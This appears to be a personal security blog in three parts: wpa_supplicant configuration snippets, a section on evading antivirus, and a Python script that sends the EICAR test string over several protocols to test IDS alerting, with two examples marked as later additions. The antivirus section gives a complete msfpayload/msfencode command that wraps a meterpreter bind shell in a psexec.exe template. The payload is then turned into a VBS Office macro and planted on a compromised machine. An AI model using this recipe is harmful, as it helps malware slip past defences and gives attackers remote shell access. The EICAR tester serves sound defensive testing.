______ Y ______

My own personal time capsule.

wpa_supplicant – quick reference

wpa_supplicant is an excellent Linux tool for connecting to all sorts of WPA-enabled networks. Frankly speaking, it is so simple to use that configuring it should take less than 30 seconds, provided you know which config fits which kind of network. Here is the list of tested configs:

Open Network

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
ssid="<your SSID>"
key_mgmt=NONE
priority=2
}

WPA Network

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
ssid="<your SSID>"
proto=WPA
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP WEP104 WEP40
psk=<psk key> # 64 unquoted hex characters as produced by wpa_passphrase
}

WPA2 Network

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=WPA2
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP
psk="<psk key>" # quoted = plain passphrase; use 64 unquoted hex characters for a wpa_passphrase PSK instead
}

EAP-PEAP

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=RSN
key_mgmt=WPA-EAP
pairwise=CCMP
group=CCMP
eap=PEAP
priority=2
eapol_flags=0
identity="<username>"
password="<password>"
}

Cisco LEAP

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=WPA
key_mgmt=WPA-EAP
pairwise=TKIP
eap=LEAP
priority=2
auth_alg=LEAP
eapol_flags=0
identity="<username>"
password="<password>"
}

EAP-TTLS

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
scan_ssid=1
mode=0
ssid="<your SSID>"
proto=RSN
key_mgmt=IEEE8021X
phase2="auth=PAP" # can also be: auth=CHAP, auth=MSCHAP, auth=MSCHAPV2
eap=TTLS
identity="<username>"
password="<password>"
}

EAP-TLS

Step 1) extract the CA chain and the client certificate plus private key from the PKCS#12 bundle:
openssl pkcs12 -in <your_network_certificate>.pfx -out ca.pem -cacerts -nokeys
openssl pkcs12 -in <your_network_certificate>.pfx -out user.pem -clcerts
Step 2) wpa_supplicant config (the file names refer to the two files produced in step 1):
ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
ctrl_interface_group=0
network={
      ssid="<your SSID>"
      scan_ssid=1
      key_mgmt=WPA-EAP
      pairwise=CCMP TKIP
      group=CCMP TKIP
      eap=TLS
      identity="<username>"
      ca_cert="ca.pem"
      client_cert="user.pem"
      private_key="user.pem"
      private_key_passwd="<export password given to openssl for user.pem>"
}

How do we even use wpa_supplicant? Simply follow these steps:

Step 1) download and install it (source here)
Step 2) save one of the above configs to a file – e.g. ‘/etc/wpa_supplicant_LEAP.conf’
Step 3) if the network is PSK based, use wpa_passphrase to generate the PSK from the passphrase and SSID and copy it into the config – note the ‘psk key’ markers in the configs above where the PSK goes
Step 4) run wpa_supplicant as follows:

wpa_supplicant -c <path_to_your_config_file> -i <your interface>

Add -dd to the above command for extra debugging output.
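Added example, not part of the original post: the derivation wpa_passphrase performs in step 3 (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 rounds, 32 bytes), rendered into an unquoted psk= line like the WPA config above; a quoted psk="..." holds the plain passphrase instead and wpa_supplicant derives the key itself at load time. The function names are mine; the values checked are the IEEE 802.11i Annex H test vectors.

```python
import hashlib
import re


def wpa_psk(passphrase: str, ssid: str) -> str:
    """Derive the 256-bit WPA/WPA2 PSK exactly as wpa_passphrase does.

    IEEE 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes),
    returned as the 64 lowercase hex characters that go into an unquoted psk= line.
    """
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        raise ValueError("passphrase must be 8 to 63 ASCII characters")
    ssid_bytes = ssid.encode("utf-8")
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1 to 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid_bytes, 4096, 32).hex()


def is_hex_psk(value: str) -> bool:
    """True if value is already a pre-derived PSK (64 hex chars, written without quotes)."""
    return re.fullmatch(r"[0-9a-fA-F]{64}", value) is not None


def network_block(ssid: str, passphrase: str, proto: str = "WPA2") -> str:
    """Render a network={} block like the WPA/WPA2 configs above, but with the
    derived hex PSK instead of the passphrase, so the passphrase is not stored in the file."""
    psk = wpa_psk(passphrase, ssid)
    lines = [
        "network={",
        "\tscan_ssid=1",
        '\tssid="%s"' % ssid,
        "\tproto=%s" % proto,
        "\tkey_mgmt=WPA-PSK",
        "\tpairwise=CCMP",
        "\tgroup=CCMP",
        "\tpsk=%s" % psk,  # unquoted: wpa_supplicant reads this as the raw 256-bit key
        "}",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print(network_block("IEEE", "password"))
```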

Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to use msfencode templates (the -x option) to wrap the payload. This can be done in a few simple steps:

1) Generate the payload
2) Pipe it to msfencode with the -x option (use e.g. psexec.exe as the template)
3) Use it to create a vbs script with a binary representation of the code
4) Paste the output into a macro in Word, Excel or anything else from the Office suite
5) Run the “ShellcodeExecute” macro from inside Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs 

And finally copy & paste the ‘BIND_4999.vbs’ content into an MS Word document as a macro. Now upload it to create a listener shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted, e.g. by a firewall, or it's in a DMZ.

IDS/IPS Testing with EICAR

The following script will attempt to submit the common EICAR test string over multiple ports and protocols for an IDS/IPS system to alert on. It can be used to test how well the IDS picks up malware seen on the wire under each protocol.

#!/usr/bin/env python3
# IMPORTS
import socket
import ssl
import http.client
import urllib.parse
import ftplib

# the eicar string to test with (raw literal so the backslash before P is kept as-is)
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
############# CONFIGURATION #############
IP = "127.0.0.1"
TIMEOUT = 4  # seconds; the nc listeners never answer, so every probe must time out cleanly
############# END OF CONF #############


def info():
    print("[+] Multi-Protocol EICAR tester by Y")
    print("[+] contact : If you know me then give me a shout")
    print("[+] Supports - HTTP, FTP, TELNET, SSL , TCP , UDP , DNS")
    print("[+] NOTE: Set NC listener on specific ports between the hosts and IDS and watch IDS alerting on protocols")
    print("[+] Following ports are used: 21(TCP),23(TCP),25(TCP),100(UDP),80(TCP),22(TCP),443(TCP),53(UDP)")


def _tcp_send(target, port, payload):
    """Open a TCP connection, write the payload bytes, close."""
    with socket.create_connection((target, int(port)), timeout=TIMEOUT) as s:
        s.sendall(payload)


def _http_probe(make_conn):
    """Send HEAD/GET/PUT/DELETE with EICAR as the request path, then a POST with
    EICAR in a form-encoded body. A fresh connection is used for every method:
    the listener never replies and http.client refuses a second request on a
    connection whose response has not been read, so reusing one connection
    would silently send only the first method."""
    for method in ("HEAD", "GET", "PUT", "DELETE"):
        try:
            print("\t", method)
            make_conn().request(method, EICAR)
        except Exception:
            pass
    try:
        print("\t POST")
        params = urllib.parse.urlencode({"eicar": EICAR})
        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
        make_conn().request("POST", "/", params, headers)
    except Exception:
        pass


def sendHTTP(data, target, port):
    try:
        print("[+] Sending HTTP request")
        _http_probe(lambda: http.client.HTTPConnection(target, port, timeout=TIMEOUT))
    except Exception as e:
        print("[-] Unable to send HTTP data due to :", e)


def sendFTP(data, target, port):
    try:
        print("[+] Sending FTP request")
        ftp = ftplib.FTP()
        # connect() waits for the 220 banner, so a bare nc listener has to send one line first
        ftp.connect(target, port, timeout=TIMEOUT)
        ftp.putline(data)  # send EICAR as a single (bogus) FTP command line
        ftp.close()
    except Exception as e:
        print("[-] Unable to send FTP data due to :", e)


def sendTelnet(data, target, port):
    try:
        print("[+] Sending TELNET request")
        _tcp_send(target, port, data.encode("ascii") + b"\r\n")
    except Exception as e:
        print("[-] Unable to send TELNET data due to :", e)


def sendSMTP(data, target, port):
    try:
        print("[+] Sending SMTP request")
        # one command per line with CRLF, EICAR as the message body, '.' ends DATA
        dialogue = "\r\n".join([
            "HELO localhost",
            "MAIL FROM:<root@localhost>",
            "RCPT TO:<root@localhost>",
            "DATA",
            data,
            ".",
            "QUIT",
        ]) + "\r\n"
        _tcp_send(target, port, dialogue.encode("ascii"))
    except Exception as e:
        print("[-] Unable to send SMTP data due to :", e)


def sendSSH(data, target, port):
    pass  # not implemented, see TODO in start_test()


def sendSSL(data, target, port):
    try:
        print("[+] Sending HTTPS request")
        # the test listener has no trusted certificate, so certificate checks are off here
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        _http_probe(lambda: http.client.HTTPSConnection(target, port, timeout=TIMEOUT, context=ctx))
    except Exception as e:
        print("[-] Unable to send HTTPS data due to :", e)


def sendICMP(data, target):
    pass  # not implemented


def sendRCP(data, target, port):
    pass  # not implemented


def sendTCP(data, target, port):
    try:
        print("[+] Sending TCP data ")
        _tcp_send(target, port, data.encode("ascii"))
    except Exception as e:
        print("[-] Unable to send TCP data due to :", e)


def sendUDP(data, target, port):
    try:
        print("[+] Sending UDP data ")
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(data.encode("ascii"), (target, int(port)))
        sock.close()
    except Exception as e:
        print("[-] Unable to send UDP data due to :", e)


def sendNETBIOS(data, target, port):
    pass  # not implemented


def sendDNS(data, target, port):
    try:
        print("[+] Sending DNS request ")
        sendUDP(data, target, port)  # dirty trick: raw EICAR in a UDP datagram to port 53
    except Exception as e:
        print("[-] Unable to send DNS data due to :", e)


def end():
    print("Done, now review IDS logs for each protocol")


def start_test():
    info()

    sendFTP(EICAR, IP, 21)
    sendTelnet(EICAR, IP, 23)
    sendSMTP(EICAR, IP, 25)
    sendUDP(EICAR, IP, 100)
    sendHTTP(EICAR, IP, 80)
    sendTCP(EICAR, IP, 22)
    sendSSL(EICAR, IP, 443)
    sendDNS(EICAR, IP, 53)

    #TODO:
    #Protocol play ( these are HPING2 wrappers )
    #sendICMP(EICAR,'192.168.2.79')
    #sendRCP(EICAR, '192.168.2.79', 445)
    #sendNETBIOS(EICAR, '192.168.2.79', 139)
    #sendSSH(EICAR, '192.168.2.79', 22)

    end()


# start the test
if __name__ == "__main__":
    start_test()
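Added example, not part of the original script: a defender-side check run over constructed captures shaped like the probes above, showing that the POST probe carries EICAR percent-encoded by urlencode, so a sensor that only byte-matches the raw string alerts on the FTP, GET and SMTP probes but misses that one unless it decodes form bodies. The function names and the sample captures are mine.

```python
from typing import Dict, Optional
from urllib.parse import unquote_to_bytes, urlencode

# The EICAR test string, byte-exact (raw literal keeps the backslash before P).
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def find_eicar(payload: bytes) -> Optional[str]:
    """Report how EICAR is present in a captured payload, or None if it is not.

    'raw'        the 68 bytes are on the wire verbatim (FTP, telnet, SMTP, TCP,
                 UDP and the request line of the GET/HEAD/PUT/DELETE probes);
    'urlencoded' only visible after percent-decoding, which is how the POST
                 probe carries it (urlencode turns '!' into %21, '+' into %2B, ...).
    A sensor that only byte-matches the raw string misses the second case.
    """
    if EICAR in payload:
        return "raw"
    # application/x-www-form-urlencoded: '+' means space, %XX is one byte
    if EICAR in unquote_to_bytes(payload.replace(b"+", b" ")):
        return "urlencoded"
    return None


def sample_captures() -> Dict[str, bytes]:
    """Constructed samples shaped like what the tester above puts on the wire."""
    body = urlencode({"eicar": EICAR.decode("ascii")}).encode("ascii")
    return {
        "ftp":       EICAR + b"\r\n",
        "http-get":  b"GET " + EICAR + b" HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n",
        "http-post": (b"POST / HTTP/1.1\r\nHost: 127.0.0.1\r\n"
                      b"Content-type: application/x-www-form-urlencoded\r\n"
                      b"Content-Length: %d\r\n\r\n" % len(body) + body),
        "smtp":      b"DATA\r\n" + EICAR + b"\r\n.\r\n",
        "benign":    b"GET /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n",
    }


def classify(captures: Dict[str, bytes]) -> Dict[str, Optional[str]]:
    """Map each capture name to the encoding EICAR was found in (None = not found)."""
    return {name: find_eicar(data) for name, data in captures.items()}


if __name__ == "__main__":
    for name, how in classify(sample_captures()).items():
        print("%-10s %s" % (name, how or "not found"))
```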